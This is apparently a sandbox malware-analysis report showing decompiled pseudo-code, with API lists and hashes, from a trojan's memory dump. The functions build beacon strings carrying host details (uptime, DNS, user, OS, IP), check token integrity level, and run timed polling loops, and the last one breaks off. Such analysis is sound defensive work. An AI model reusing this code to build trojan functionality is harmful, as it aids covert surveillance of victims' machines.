                                                                                                              • Part of subcall function 6F0472B0: task.LIBCPMTD ref: 6F047352
                                                                                                              • Part of subcall function 6F04BA20: swap.LIBCPMTD ref: 6F04BA39
                                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6F0C7144,?,?,?,?,?,00000000), ref: 6F045950
                                                                                                            • std::locale::locale.LIBCPMTD ref: 6F0459D8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                            • String ID: ?
                                                                                                            • API String ID: 756721536-1684325040
                                                                                                            • Opcode ID: 80f1fa31fab8db82761f2dd60790cbfbb4312e20bb01cc056dde5a4f9ee2e9d0
                                                                                                            • Instruction ID: 2f6f9adb6c59c61e1ddf97a80f01413311ca98bf2b66b52aad743d6f9d658509
                                                                                                            • Opcode Fuzzy Hash: 80f1fa31fab8db82761f2dd60790cbfbb4312e20bb01cc056dde5a4f9ee2e9d0
                                                                                                            • Instruction Fuzzy Hash: A8522FB1D00616CFCB08DF69DD90BA9BBB2FB4A314F208129D90597396D7385859EF48
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 66%
                                                                                                            			E030344A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                            				intOrPtr _v0;
                                                                                                            				intOrPtr _v4;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				void* _v44;
                                                                                                            				intOrPtr _v52;
                                                                                                            				void* __edi;
                                                                                                            				long _t25;
                                                                                                            				intOrPtr _t26;
                                                                                                            				intOrPtr _t27;
                                                                                                            				intOrPtr _t28;
                                                                                                            				intOrPtr _t29;
                                                                                                            				intOrPtr _t30;
                                                                                                            				void* _t33;
                                                                                                            				intOrPtr _t34;
                                                                                                            				int _t37;
                                                                                                            				void* _t38;
                                                                                                            				intOrPtr _t42;
                                                                                                            				intOrPtr _t43;
                                                                                                            				void* _t46;
                                                                                                            				intOrPtr _t50;
                                                                                                            				intOrPtr _t54;
                                                                                                            				intOrPtr* _t56;
                                                                                                            				intOrPtr _t62;
                                                                                                            				intOrPtr _t68;
                                                                                                            				intOrPtr _t71;
                                                                                                            				intOrPtr _t74;
                                                                                                            				int _t77;
                                                                                                            				intOrPtr _t78;
                                                                                                            				int _t81;
                                                                                                            				intOrPtr _t83;
                                                                                                            				int _t86;
                                                                                                            				intOrPtr* _t89;
                                                                                                            				intOrPtr* _t90;
                                                                                                            				void* _t91;
                                                                                                            				void* _t95;
                                                                                                            				void* _t96;
                                                                                                            				void* _t97;
                                                                                                            				intOrPtr _t98;
                                                                                                            				void* _t100;
                                                                                                            				int _t101;
                                                                                                            				void* _t102;
                                                                                                            				void* _t103;
                                                                                                            				void* _t105;
                                                                                                            				void* _t106;
                                                                                                            				void* _t108;
                                                                                                            
                                                                                                            				_t95 = __edx;
                                                                                                            				_t91 = __ecx;
                                                                                                            				_t25 = __eax;
                                                                                                            				_t105 = _a16;
                                                                                                            				_v4 = 8;
                                                                                                            				if(__eax == 0) {
                                                                                                            					_t25 = GetTickCount();
                                                                                                            				}
                                                                                                            				_t26 =  *0x303d018; // 0x3dd6b064
                                                                                                            				asm("bswap eax");
                                                                                                            				_t27 =  *0x303d014; // 0x3a87c8cd
                                                                                                            				asm("bswap eax");
                                                                                                            				_t28 =  *0x303d010; // 0xd8d2f808
                                                                                                            				asm("bswap eax");
                                                                                                            				_t29 =  *0x303d00c; // 0x13d015ef
                                                                                                            				asm("bswap eax");
                                                                                                            				_t30 =  *0x303d2e0; // 0x22da5a8
                                                                                                            				_t3 = _t30 + 0x303e633; // 0x74666f73
                                                                                                            				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0x303d02c,  *0x303d004, _t25);
                                                                                                            				_t33 = E03035B60();
                                                                                                            				_t34 =  *0x303d2e0; // 0x22da5a8
                                                                                                            				_t4 = _t34 + 0x303e673; // 0x74707526
                                                                                                            				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                                                                            				_t108 = _t106 + 0x38;
                                                                                                            				_t102 = _t101 + _t37; // executed
                                                                                                            				_t38 = E03031BBF(_t91); // executed
                                                                                                            				_t96 = _t38;
                                                                                                            				if(_t96 != 0) {
                                                                                                            					_t83 =  *0x303d2e0; // 0x22da5a8
                                                                                                            					_t6 = _t83 + 0x303e8cc; // 0x736e6426
                                                                                                            					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                                                                            					_t108 = _t108 + 0xc;
                                                                                                            					_t102 = _t102 + _t86;
                                                                                                            					HeapFree( *0x303d270, 0, _t96);
                                                                                                            				}
                                                                                                            				_t97 = E0303137A();
                                                                                                            				if(_t97 != 0) {
                                                                                                            					_t78 =  *0x303d2e0; // 0x22da5a8
                                                                                                            					_t8 = _t78 + 0x303e8d4; // 0x6f687726
                                                                                                            					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                                                                            					_t108 = _t108 + 0xc;
                                                                                                            					_t102 = _t102 + _t81;
                                                                                                            					HeapFree( *0x303d270, 0, _t97);
                                                                                                            				}
                                                                                                            				_t98 =  *0x303d364; // 0x53195b0
                                                                                                            				_a32 = E03033857(0x303d00a, _t98 + 4);
                                                                                                            				_t42 =  *0x303d308; // 0x0
                                                                                                            				if(_t42 != 0) {
                                                                                                            					_t74 =  *0x303d2e0; // 0x22da5a8
                                                                                                            					_t11 = _t74 + 0x303e8ae; // 0x3d736f26
                                                                                                            					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                                                                            					_t108 = _t108 + 0xc;
                                                                                                            					_t102 = _t102 + _t77;
                                                                                                            				}
                                                                                                            				_t43 =  *0x303d304; // 0x0
                                                                                                            				if(_t43 != 0) {
                                                                                                            					_t71 =  *0x303d2e0; // 0x22da5a8
                                                                                                            					_t13 = _t71 + 0x303e885; // 0x3d706926
                                                                                                            					wsprintfA(_t102 + _t105, _t13, _t43);
                                                                                                            				}
                                                                                                            				if(_a32 != 0) {
                                                                                                            					_t46 = RtlAllocateHeap( *0x303d270, 0, 0x800); // executed
                                                                                                            					_t100 = _t46;
                                                                                                            					if(_t100 != 0) {
                                                                                                            						E0303A811(GetTickCount());
                                                                                                            						_t50 =  *0x303d364; // 0x53195b0
                                                                                                            						__imp__(_t50 + 0x40);
                                                                                                            						asm("lock xadd [eax], ecx");
                                                                                                            						_t54 =  *0x303d364; // 0x53195b0
                                                                                                            						__imp__(_t54 + 0x40);
                                                                                                            						_t56 =  *0x303d364; // 0x53195b0
                                                                                                            						_t103 = E03031974(1, _t95, _t105,  *_t56);
                                                                                                            						asm("lock xadd [eax], ecx");
                                                                                                            						if(_t103 != 0) {
                                                                                                            							StrTrimA(_t103, 0x303c2ac);
                                                                                                            							_push(_t103);
                                                                                                            							_t62 = E030338CA();
                                                                                                            							_v16 = _t62;
                                                                                                            							if(_t62 != 0) {
                                                                                                            								_t89 = __imp__;
                                                                                                            								 *_t89(_t103, _v0);
                                                                                                            								 *_t89(_t100, _a4);
                                                                                                            								_t90 = __imp__;
                                                                                                            								 *_t90(_t100, _v28);
                                                                                                            								 *_t90(_t100, _t103);
                                                                                                            								_t68 = E03032A4E(0xffffffffffffffff, _t100, _v28, _v24); // executed
                                                                                                            								_v52 = _t68;
                                                                                                            								if(_t68 != 0 && _t68 != 0x10d2) {
                                                                                                            									E030347D5();
                                                                                                            								}
                                                                                                            								RtlFreeHeap( *0x303d270, 0, _v44); // executed
                                                                                                            							}
                                                                                                            							HeapFree( *0x303d270, 0, _t103);
                                                                                                            						}
                                                                                                            						RtlFreeHeap( *0x303d270, 0, _t100); // executed
                                                                                                            					}
                                                                                                            					HeapFree( *0x303d270, 0, _a24);
                                                                                                            				}
                                                                                                            				RtlFreeHeap( *0x303d270, 0, _t105); // executed
                                                                                                            				return _a4;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 030344BB
                                                                                                            • wsprintfA.USER32 ref: 03034508
                                                                                                            • wsprintfA.USER32 ref: 03034525
                                                                                                            • wsprintfA.USER32 ref: 03034548
                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 03034558
                                                                                                            • wsprintfA.USER32 ref: 0303457A
                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0303458A
                                                                                                            • wsprintfA.USER32 ref: 030345C1
                                                                                                            • wsprintfA.USER32 ref: 030345E1
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 030345FE
                                                                                                            • GetTickCount.KERNEL32 ref: 0303460E
                                                                                                            • RtlEnterCriticalSection.NTDLL(05319570), ref: 03034622
                                                                                                            • RtlLeaveCriticalSection.NTDLL(05319570), ref: 03034640
                                                                                                              • Part of subcall function 03031974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,03034653,?,053195B0), ref: 0303199F
                                                                                                              • Part of subcall function 03031974: lstrlen.KERNEL32(?,?,?,03034653,?,053195B0), ref: 030319A7
                                                                                                              • Part of subcall function 03031974: strcpy.NTDLL ref: 030319BE
                                                                                                              • Part of subcall function 03031974: lstrcat.KERNEL32(00000000,?), ref: 030319C9
                                                                                                              • Part of subcall function 03031974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03034653,?,053195B0), ref: 030319E6
                                                                                                            • StrTrimA.SHLWAPI(00000000,0303C2AC,?,053195B0), ref: 03034672
                                                                                                              • Part of subcall function 030338CA: lstrlen.KERNEL32(05319B10,00000000,00000000,770CC740,0303467E,00000000), ref: 030338DA
                                                                                                              • Part of subcall function 030338CA: lstrlen.KERNEL32(?), ref: 030338E2
                                                                                                              • Part of subcall function 030338CA: lstrcpy.KERNEL32(00000000,05319B10), ref: 030338F6
                                                                                                              • Part of subcall function 030338CA: lstrcat.KERNEL32(00000000,?), ref: 03033901
                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 03034691
                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 03034698
                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 030346A5
                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 030346A9
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,00000000,?,?), ref: 030346D9
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 030346E8
                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,053195B0), ref: 030346F7
                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 03034709
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?), ref: 03034718
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3963266935-1536154274
                                                                                                            • Opcode ID: 03ae7d9ab11fab18aec4c46d95f62025d4fcbfe9b0c5dce1ad729ad9b4c6c38b
                                                                                                            • Instruction ID: a9b2aa040e78c9d1313dfa13ffcf69b6d08ba4f9c01f0d8a1fe74436de8a9fc2
                                                                                                            • Opcode Fuzzy Hash: 03ae7d9ab11fab18aec4c46d95f62025d4fcbfe9b0c5dce1ad729ad9b4c6c38b
                                                                                                            • Instruction Fuzzy Hash: D161BD76502200AFD721FB68EC88F9677ECFB49740F080524F909DB255DB39E816CB6A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E03035461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				struct %anon52 _v8;
                                                                                                            				long _v12;
                                                                                                            				char _v16;
                                                                                                            				char _v20;
                                                                                                            				signed int _v24;
                                                                                                            				intOrPtr _v32;
                                                                                                            				union _LARGE_INTEGER _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				void* _v44;
                                                                                                            				void _v88;
                                                                                                            				char _v92;
                                                                                                            				struct %anon52 _t46;
                                                                                                            				intOrPtr _t51;
                                                                                                            				long _t53;
                                                                                                            				void* _t54;
                                                                                                            				struct %anon52 _t60;
                                                                                                            				long _t64;
                                                                                                            				signed int _t65;
                                                                                                            				void* _t68;
                                                                                                            				void* _t70;
                                                                                                            				signed int _t71;
                                                                                                            				intOrPtr _t73;
                                                                                                            				intOrPtr _t76;
                                                                                                            				void** _t78;
                                                                                                            				void* _t80;
                                                                                                            
                                                                                                            				_t73 = __edx;
                                                                                                            				_v92 = 0;
                                                                                                            				memset( &_v88, 0, 0x2c);
                                                                                                            				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                            				_v44 = _t46;
                                                                                                            				if(_t46 == 0) {
                                                                                                            					_v8.LowPart = GetLastError();
                                                                                                            				} else {
                                                                                                            					_push(0xffffffff);
                                                                                                            					_push(0xff676980);
                                                                                                            					_push(0);
                                                                                                            					_push( *0x303d278);
                                                                                                            					_v20 = 0;
                                                                                                            					_v16 = 0;
                                                                                                            					L0303AED0();
                                                                                                            					_v36.LowPart = _t46;
                                                                                                            					_v32 = _t73;
                                                                                                            					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                            					_t51 =  *0x303d2a4; // 0x2ec
                                                                                                            					_v40 = _t51;
                                                                                                            					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                            					_v8.LowPart = _t53;
                                                                                                            					if(_t53 == 0) {
                                                                                                            						if(_a8 != 0) {
                                                                                                            							L4:
                                                                                                            							 *0x303d284 = 5;
                                                                                                            						} else {
                                                                                                            							_t68 = E0303502E(_t73); // executed
                                                                                                            							if(_t68 != 0) {
                                                                                                            								goto L4;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_v12 = 0;
                                                                                                            						L6:
                                                                                                            						L6:
                                                                                                            						if(_v12 == 1 && ( *0x303d298 & 0x00000001) == 0) {
                                                                                                            							_v12 = 2;
                                                                                                            						}
                                                                                                            						_t71 = _v12;
                                                                                                            						_t58 = _t71 << 4;
                                                                                                            						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                            						_t72 = _t71 + 1;
                                                                                                            						_v24 = _t71 + 1;
                                                                                                            						_t60 = E0303577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                                                                            						_v8.LowPart = _t60;
                                                                                                            						if(_t60 != 0) {
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            						_t65 = _v24;
                                                                                                            						_v12 = _t65;
                                                                                                            						_t90 = _t65 - 3;
                                                                                                            						if(_t65 != 3) {
                                                                                                            							goto L6;
                                                                                                            						} else {
                                                                                                            							_v8.LowPart = E03032107(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                            						}
                                                                                                            						goto L12;
                                                                                                            						L17:
                                                                                                            						__eflags = _t60 - 0x10d2;
                                                                                                            						if(_t60 != 0x10d2) {
                                                                                                            							_push(0xffffffff);
                                                                                                            							_push(0xff676980);
                                                                                                            							_push(0);
                                                                                                            							_push( *0x303d27c);
                                                                                                            							goto L21;
                                                                                                            						} else {
                                                                                                            							__eflags =  *0x303d280; // 0x0
                                                                                                            							if(__eflags == 0) {
                                                                                                            								goto L12;
                                                                                                            							} else {
                                                                                                            								_t60 = E030347D5();
                                                                                                            								_push(0xffffffff);
                                                                                                            								_push(0xdc3cba00);
                                                                                                            								_push(0);
                                                                                                            								_push( *0x303d280);
                                                                                                            								L21:
                                                                                                            								L0303AED0();
                                                                                                            								_v36.LowPart = _t60;
                                                                                                            								_v32 = _t76;
                                                                                                            								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                            								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                            								_v8.LowPart = _t64;
                                                                                                            								__eflags = _t64;
                                                                                                            								if(_t64 == 0) {
                                                                                                            									goto L6;
                                                                                                            								} else {
                                                                                                            									goto L12;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L25:
                                                                                                            					}
                                                                                                            					L12:
                                                                                                            					_t78 =  &_v92;
                                                                                                            					_t70 = 3;
                                                                                                            					do {
                                                                                                            						_t54 =  *_t78;
                                                                                                            						if(_t54 != 0) {
                                                                                                            							HeapFree( *0x303d270, 0, _t54);
                                                                                                            						}
                                                                                                            						_t78 =  &(_t78[4]);
                                                                                                            						_t70 = _t70 - 1;
                                                                                                            					} while (_t70 != 0);
                                                                                                            					CloseHandle(_v44);
                                                                                                            				}
                                                                                                            				return _v8;
                                                                                                            				goto L25;
                                                                                                            			}





























                                                                                                            APIs
                                                                                                            • memset.NTDLL ref: 03035476
                                                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 03035482
                                                                                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 030354A7
                                                                                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 030354C3
                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 030354DC
                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 03035572
                                                                                                            • CloseHandle.KERNEL32(?), ref: 03035581
                                                                                                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 030355BB
                                                                                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,030353C9,?), ref: 030355D1
                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 030355DC
                                                                                                              • Part of subcall function 0303502E: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05319370,00000000,?,747DF710,00000000,747DF730), ref: 0303507D
                                                                                                              • Part of subcall function 0303502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,053193A8,?,00000000,30314549,00000014,004F0053,05319364), ref: 0303511A
                                                                                                              • Part of subcall function 0303502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,030354EF), ref: 0303512C
                                                                                                            • GetLastError.KERNEL32 ref: 030355EE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                            • String ID: Uxt$@MxtNxt
                                                                                                            • API String ID: 3521023985-2342693527
                                                                                                            • Opcode ID: 00f1b25108f7e2d9ff706c9e10b6a5ed61ec4006b97af7976182e6169bb329ad
                                                                                                            • Instruction ID: be08a06371b7b2839568d2c0cce3adf8055628370f46d8da9adb8995f21b36fa
                                                                                                            • Opcode Fuzzy Hash: 00f1b25108f7e2d9ff706c9e10b6a5ed61ec4006b97af7976182e6169bb329ad
                                                                                                            • Instruction Fuzzy Hash: 465158B1802228ABDF11EFA5DC449EEBFBDEF4A720F244616F411E61A4D7349640CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 74%
                                                                                                            			E03033598(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				struct _FILETIME* _v12;
                                                                                                            				short _v56;
                                                                                                            				struct _FILETIME* _t12;
                                                                                                            				intOrPtr _t13;
                                                                                                            				void* _t17;
                                                                                                            				void* _t21;
                                                                                                            				intOrPtr _t27;
                                                                                                            				long _t28;
                                                                                                            				void* _t30;
                                                                                                            
                                                                                                            				_t27 = __edx;
                                                                                                            				_t12 =  &_v12;
                                                                                                            				GetSystemTimeAsFileTime(_t12);
                                                                                                            				_push(0x192);
                                                                                                            				_push(0x54d38000);
                                                                                                            				_push(_v8);
                                                                                                            				_push(_v12);
                                                                                                            				L0303AECA();
                                                                                                            				_push(_t12);
                                                                                                            				_v12 = _t12;
                                                                                                            				_t13 =  *0x303d2e0; // 0x22da5a8
                                                                                                            				_t5 = _t13 + 0x303e876; // 0x5318e1e
                                                                                                            				_t6 = _t13 + 0x303e59c; // 0x530025
                                                                                                            				_push(0x16);
                                                                                                            				_push( &_v56);
                                                                                                            				_v8 = _t27;
                                                                                                            				L0303ABEA();
                                                                                                            				_t17 = CreateFileMappingW(0xffffffff, 0x303d2e4, 4, 0, 0x1000,  &_v56); // executed
                                                                                                            				_t30 = _t17;
                                                                                                            				if(_t30 == 0) {
                                                                                                            					_t28 = GetLastError();
                                                                                                            				} else {
                                                                                                            					if(GetLastError() == 0xb7) {
                                                                                                            						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                            						if(_t21 == 0) {
                                                                                                            							_t28 = GetLastError();
                                                                                                            							if(_t28 != 0) {
                                                                                                            								goto L6;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							 *_a4 = _t30;
                                                                                                            							 *_a8 = _t21;
                                                                                                            							_t28 = 0;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t28 = 2;
                                                                                                            						L6:
                                                                                                            						CloseHandle(_t30);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t28;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,0303529C,?,?,4D283A53,?,?), ref: 030335A4
                                                                                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 030335BA
                                                                                                            • _snwprintf.NTDLL ref: 030335DF
                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,0303D2E4,00000004,00000000,00001000,?), ref: 030335FB
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0303529C,?,?,4D283A53), ref: 0303360D
                                                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 03033624
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0303529C,?,?), ref: 03033645
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0303529C,?,?,4D283A53), ref: 0303364D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                            • String ID: @MxtNxt
                                                                                                            • API String ID: 1814172918-1701360479
                                                                                                            • Opcode ID: f080211639c2a838625fb7eaef1c144475b11051c9a9a5b04790bc75beaca1d2
                                                                                                            • Instruction ID: db4ed6117f53ad4a0e185e2e68c3ed65fd943234e4377ca3456c358d50de511b
                                                                                                            • Opcode Fuzzy Hash: f080211639c2a838625fb7eaef1c144475b11051c9a9a5b04790bc75beaca1d2
                                                                                                            • Instruction Fuzzy Hash: 96210F7AA42204BFE751EB68CC89FCE77ADAB86B10F244161F606EB281D770D5018B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03034151(long* _a4) {
                                                                                                            				long _v8;
                                                                                                            				void* _v12;
                                                                                                            				void _v16;
                                                                                                            				long _v20;
                                                                                                            				int _t33;
                                                                                                            				void* _t46;
                                                                                                            
                                                                                                            				_v16 = 1;
                                                                                                            				_v20 = 0x2000;
                                                                                                            				if( *0x303d294 > 5) {
                                                                                                            					_v16 = 0;
                                                                                                            					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                            						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                            						_v8 = 0;
                                                                                                            						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                            						if(_v8 != 0) {
                                                                                                            							_t46 = E030375F6(_v8);
                                                                                                            							if(_t46 != 0) {
                                                                                                            								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                            								if(_t33 != 0) {
                                                                                                            									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                            								}
                                                                                                            								E03034AAB(_t46);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						CloseHandle(_v12);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *_a4 = _v20;
                                                                                                            				return _v16;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 03034183
                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 030341A3
                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 030341B3
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 03034203
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 030341D6
                                                                                                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 030341DE
                                                                                                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 030341EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1295030180-0
                                                                                                            • Opcode ID: 6ee3d5012e6c7bae080b276c0e73f6c7fe7b037ad272405df782c9accdc7b09a
                                                                                                            • Instruction ID: 4f183558ef2da08beef79bfaef5dd9d7bc53d45a36985a783bf0708965ac0e88
                                                                                                            • Opcode Fuzzy Hash: 6ee3d5012e6c7bae080b276c0e73f6c7fe7b037ad272405df782c9accdc7b09a
                                                                                                            • Instruction Fuzzy Hash: 0F216A75901209FFEB00EFA5DC84EEEBBBDEF49704F0000A6F910A6150C7758A15DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 74%
                                                                                                            			E0303262F(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                            				struct _FILETIME _v12;
                                                                                                            				void* _t10;
                                                                                                            				void* _t12;
                                                                                                            				int _t14;
                                                                                                            				signed int _t16;
                                                                                                            				void* _t18;
                                                                                                            				signed int _t19;
                                                                                                            				unsigned int _t23;
                                                                                                            				void* _t27;
                                                                                                            				signed int _t34;
                                                                                                            
                                                                                                            				_t27 = __edx;
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                            				 *0x303d270 = _t10;
                                                                                                            				if(_t10 != 0) {
                                                                                                            					 *0x303d160 = GetTickCount();
                                                                                                            					_t12 = E03031A24(_a4);
                                                                                                            					if(_t12 == 0) {
                                                                                                            						do {
                                                                                                            							GetSystemTimeAsFileTime( &_v12);
                                                                                                            							_t14 = SwitchToThread();
                                                                                                            							_t23 = _v12.dwHighDateTime;
                                                                                                            							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                                                                            							_push(0);
                                                                                                            							_push(0x13);
                                                                                                            							_push(_t23 >> 5);
                                                                                                            							_push(_t16);
                                                                                                            							L0303B02E();
                                                                                                            							_t34 = _t14 + _t16;
                                                                                                            							_t18 = E03034F23(_a4, _t34);
                                                                                                            							_t19 = 3;
                                                                                                            							_t26 = _t34 & 0x00000007;
                                                                                                            							Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                                                                                            						} while (_t18 == 1);
                                                                                                            						if(E030327C7(_t26) != 0) {
